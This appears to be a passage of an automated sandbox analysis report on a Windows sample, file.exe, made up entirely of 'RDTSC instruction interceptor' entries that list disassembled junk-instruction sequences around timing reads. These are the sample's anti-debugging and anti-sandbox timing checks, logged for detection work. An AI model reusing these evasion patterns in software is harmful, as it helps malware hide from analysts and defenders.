                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446E51 second address: 1446E5B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F11F8D51842h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446E5B second address: 1446E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446E61 second address: 1446E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446E68 second address: 1446E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8F18C2Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144B074 second address: 144B086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8D5183Bh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144A7CF second address: 144A7E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pushad 0x0000000a jp 00007F11F8F18C26h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144A7E1 second address: 144A7E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144AAE9 second address: 144AAF9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F11F8F18C26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144FE3A second address: 144FE40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144FE40 second address: 144FE60 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F11F8F18C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F11F8F18C3Ah 0x00000010 jmp 00007F11F8F18C2Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144FFCC second address: 144FFE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8D51841h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1450132 second address: 1450145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnc 00007F11F8F18C2Ch 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1450145 second address: 145016B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F11F8D51848h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14502F7 second address: 14502FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14508B1 second address: 14508B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1458842 second address: 1458848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1458848 second address: 145884E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145884E second address: 145887A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F11F8F18C35h 0x00000013 jns 00007F11F8F18C26h 0x00000019 push edx 0x0000001a pop edx 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1456A14 second address: 1456A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1456A1A second address: 1456A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F11F8F18C26h 0x0000000d js 00007F11F8F18C26h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1456A2D second address: 1456A31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1456A31 second address: 1456A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1456BA8 second address: 1456BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F11F8D5183Eh 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop edi 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145717B second address: 145717F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1458299 second address: 14582AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8D5183Ch 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145C5B0 second address: 145C5C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F11F8F18C26h 0x0000000a jng 00007F11F8F18C26h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145C5C5 second address: 145C5C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145C5C9 second address: 145C5D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F11F8F18C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145CA04 second address: 145CA09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145CA09 second address: 145CA0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145CE26 second address: 145CE4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jns 00007F11F8D51836h 0x0000000c popad 0x0000000d jmp 00007F11F8D51844h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145CE4C second address: 145CE8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8F18C2Ah 0x00000009 popad 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 popad 0x00000011 pushad 0x00000012 jnl 00007F11F8F18C40h 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b pop edx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145CFC0 second address: 145CFC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145D136 second address: 145D140 instructions: 0x00000000 rdtsc 0x00000002 je 00007F11F8F18C26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146AD38 second address: 146AD3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146B191 second address: 146B195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146B195 second address: 146B199 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1469FC1 second address: 1469FC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1471FDA second address: 1471FE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1471FE4 second address: 1471FEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147191A second address: 1471939 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F11F8D51836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007F11F8D5183Ch 0x00000010 pushad 0x00000011 jp 00007F11F8D51836h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1471AAB second address: 1471AAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1471AAF second address: 1471AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8D51846h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007F11F8D5183Ah 0x00000011 pushad 0x00000012 popad 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1471AD5 second address: 1471AF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F11F8F18C37h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1471AF0 second address: 1471AF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1471AF6 second address: 1471B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b ja 00007F11F8F18C26h 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1471B08 second address: 1471B12 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F11F8D5183Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147D020 second address: 147D033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F11F8F18C2Eh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147D033 second address: 147D03D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F11F8D51836h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147D03D second address: 147D041 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147CB98 second address: 147CB9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147CB9C second address: 147CBA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147CBA8 second address: 147CBAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147CCD2 second address: 147CCF0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F11F8F18C26h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jno 00007F11F8F18C26h 0x00000013 pushad 0x00000014 popad 0x00000015 pop ecx 0x00000016 pop edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147CCF0 second address: 147CCF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147CCF4 second address: 147CCFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148F305 second address: 148F312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 jng 00007F11F8D51836h 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148F312 second address: 148F317 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148F317 second address: 148F31D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148F31D second address: 148F338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8F18C2Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148F338 second address: 148F36B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F11F8D51842h 0x0000000f jmp 00007F11F8D51847h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148F36B second address: 148F371 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149681A second address: 149681E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1496AF9 second address: 1496B04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1496B04 second address: 1496B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push ebx 0x00000009 pushad 0x0000000a je 00007F11F8D51836h 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1496E20 second address: 1496E40 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F11F8F18C37h 0x00000008 jmp 00007F11F8F18C2Fh 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1496E40 second address: 1496E44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1496F34 second address: 1496F38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1496F38 second address: 1496F7A instructions: 0x00000000 rdtsc 0x00000002 je 00007F11F8D51836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F11F8D51846h 0x00000010 push edi 0x00000011 pop edi 0x00000012 jmp 00007F11F8D51842h 0x00000017 popad 0x00000018 push edi 0x00000019 pushad 0x0000001a popad 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e jbe 00007F11F8D51836h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1497A35 second address: 1497A54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F11F8F18C39h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14A882F second address: 14A886C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8D51842h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c jnl 00007F11F8D51836h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F11F8D51846h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14AA049 second address: 14AA053 instructions: 0x00000000 rdtsc 0x00000002 je 00007F11F8F18C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14AA053 second address: 14AA06D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007F11F8D51836h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F11F8D51836h 0x00000014 jo 00007F11F8D51836h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14AA06D second address: 14AA0A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8F18C2Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F11F8F18C39h 0x00000014 jnp 00007F11F8F18C28h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14A9F03 second address: 14A9F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14AD3A1 second address: 14AD3A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14AD3A5 second address: 14AD3B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F11F8D51836h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14AD3B4 second address: 14AD3C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F11F8F18C26h 0x0000000a je 00007F11F8F18C26h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14AD3C5 second address: 14AD3F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F11F8D5183Fh 0x0000000a jmp 00007F11F8D51844h 0x0000000f popad 0x00000010 jc 00007F11F8D5183Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14BA437 second address: 14BA43B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14BA43B second address: 14BA446 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14BA446 second address: 14BA463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8F18C38h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14BA463 second address: 14BA469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14BA469 second address: 14BA46D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14BA46D second address: 14BA49B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F11F8D5183Bh 0x0000000e jmp 00007F11F8D51848h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14CC5C6 second address: 14CC5CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14CC5CE second address: 14CC5DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8D5183Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14CB48E second address: 14CB492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14CB492 second address: 14CB496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14CB496 second address: 14CB4A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14CB4A0 second address: 14CB4A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14CB5F8 second address: 14CB60D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8F18C2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14CB60D second address: 14CB625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8D5183Ch 0x00000009 push edi 0x0000000a pop edi 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14CBD2E second address: 14CBD42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F11F8F18C2Eh 0x0000000c jg 00007F11F8F18C26h 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14CBD42 second address: 14CBD5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F11F8D51843h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14CBD5B second address: 14CBDAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F11F8F18C2Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jno 00007F11F8F18C32h 0x00000014 pushad 0x00000015 jmp 00007F11F8F18C35h 0x0000001a jno 00007F11F8F18C26h 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 jng 00007F11F8F18C26h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14CBDAA second address: 14CBDBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F11F8D51836h 0x0000000a popad 0x0000000b push edi 0x0000000c jo 00007F11F8D51836h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
